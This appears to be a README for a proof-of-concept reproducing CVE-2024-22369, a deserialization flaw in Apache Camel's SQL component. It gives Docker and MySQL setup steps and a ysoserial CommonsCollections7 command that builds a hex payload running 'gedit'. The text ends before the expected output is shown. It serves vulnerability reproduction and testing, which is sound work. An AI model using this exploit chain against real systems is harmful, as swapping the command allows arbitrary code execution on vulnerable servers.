
CVE-2024-22369 Reproducer
This POC is based on the reproducer built by Ziyang Chen of HuaWei Open Source Management Center
The reproducer has been used to create this PoC, with some adjustments and clean up, and also enriched with some more automation.
We'll need a Mysql instance
docker run --name some-mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=my-secret-pw -e MYSQL_DATABASE=db -d mysql
Now we'll need to create the required tables:
You have two files: employee.sql and employee_completed.sql
Run the following command:
docker run -it --rm mysql mysql -h 172.17.0.2 -uroot -p
Insert your password, execute USE db and run the two SQL files.
At this stage you already have the required bits to reproduce the deserialization.
Run the following command
docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' some-mysql
and take note of the address.
Now edit the src/main/resources/application.properties according to what your enviroment status is.
The payload we are using is based on commons-collections 3.2.1.
You'll need to use:
https://github.com/frohoff/ysoserial
From the command line you can recreate the payload this way:
java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \ --add-opens java.base/java.net=ALL-UNNAMED \ --add-opens=java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar CommonsCollections7 gedit | xxd -p
This will return the Hex version of the payload. The idea is to run gedit command while deserializing.
You can play with possible payloads and change the SQL scripts by changing the INSERT statement and add the new
generated payloads.
To reproduce the behavior. First of all select a JDK 17 (locally or through SDKMan).
The run the following command:
mvn clean install -Dcamel.version=4.3.0 -Dspring-boot.version=3.2.0 -Djava.version=17 spring-boot:run
This will give the following output: